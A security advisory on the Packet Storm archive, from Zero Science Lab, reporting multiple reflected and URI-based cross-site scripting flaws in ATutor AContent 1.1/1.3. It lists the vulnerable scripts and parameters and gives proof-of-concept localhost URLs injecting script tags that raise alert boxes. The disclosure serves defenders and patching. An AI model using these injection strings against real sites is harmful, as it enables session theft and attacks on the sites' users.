exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ATutor AContent 1.1 / 1.3 Cross Site Scripting

ATutor AContent 1.1 / 1.3 Cross Site Scripting
Posted Aug 6, 2011
Authored by LiquidWorm | Site zeroscience.mk

ATutor AContent version 1.1 suffers from multiple cross site scripting vulnerabilities. This also affects version 1.3 as of 2014/01/05.

tags | exploit, vulnerability, xss
SHA-256 | 11f71a7a8fc1b6198d0accd72f3c4a62c57ad812171943bba7e230803cb30eff

ATutor AContent 1.1 / 1.3 Cross Site Scripting

Change Mirror Download

AContent 1.1 Multiple Cross-Site Scripting Vulnerabilities


Vendor: ATutor (Inclusive Design Institute)
Product web page: http://www.atutor.ca
Affected version: 1.1 (build r296)

Summary: AContent is an open source learning content authoring system
and respository used to create interoperable, accessible, adaptive
Web-based learning content. It can be used along with learning management
systems to develop, share, and archive learning materials.

Desc: AContent suffers from multiple XSS vulnerabilities when parsing
user input to multiple parameters via GET and POST method in multiple
scripts. Attackers can exploit these weaknesses to execute arbitrary
HTML and script code in a user's browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab


Advisory ID: ZSL-2011-5032
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5032.php



31.07.2011

--


********** Cross-Site Scripting Reflected (script name / parameter(s) / http method) **********

1. /documentation/frame_header.php (p) - GET
2. /documentation/frame_content.php (p) - GET
3. /register.php (password_error) - POST
4. /user/user_create_edit.php (id) - GET
5. /updater/patch_edit.php (myown_patch_id) - GET
6. /themes/default/login.tmpl.php (oauth_token, oauth_callback) - GET
7. /themes/default/user/user_group_create_edit.tmpl.php (id) - GET
8. /themes/default/language/language_add_edit.tmpl.php (id) - GET


********** Cross-Site Scripting URI Based (script name) **********

1. /themes/default/confirmmessage.tmpl.php
2. /themes/default/course_category/index.tmpl.php
3. /themes/default/language/index.tmpl.php
4. /themes/default/language/language_add_edit.tmpl.php
5. /themes/default/login.tmpl.php
6. /themes/default/tests/create_edit_test.tmpl.php
7. /themes/default/tests/question_cats_manage.tmpl.php
8. /themes/default/tests/questions.tmpl.php
9. /themes/default/user/index.tmpl.php
10. /themes/default/user/user_group.tmpl.php
11. /themes/default/user/user_group_create_edit.tmpl.php



-------------------------------------------------


Reflected XSS:

http://localhost/documentation/frame_header.php?p="><script>alert(1)</script>
http://localhost/documentation/frame_content.php?p="><script>alert(1)</script>
http://localhost/user/user_create_edit.php?id=71"><script>alert(1)</script>
http://localhost/updater/patch_edit.php?myown_patch_id=147"><script>alert(1)</script>
http://localhost/themes/default/login.tmpl.php?oauth_token=187"><script>alert(1)</script>&oauth_callback=187"><script>alert(2)</script>
http://localhost/themes/default/user/user_group_create_edit.tmpl.php?id=209"><script>alert(1)</script>
http://localhost/themes/default/language/language_add_edit.tmpl.php?id=353"><script>alert(1)</script>

URI XSS:

http://localhost/themes/default/confirmmessage.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/course_category/index.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/language/index.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/language/language_add_edit.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/login.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/tests/create_edit_test.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/tests/question_cats_manage.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/tests/questions.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/user/index.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/user/user_group.tmpl.php/>"><script>alert(1)</script>
http://localhost/themes/default/user/user_group_create_edit.tmpl.php/>"><script>alert(1)</script>
Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    32 Files
  • 6
    Jun 6th
    39 Files
  • 7
    Jun 7th
    22 Files
  • 8
    Jun 8th
    17 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close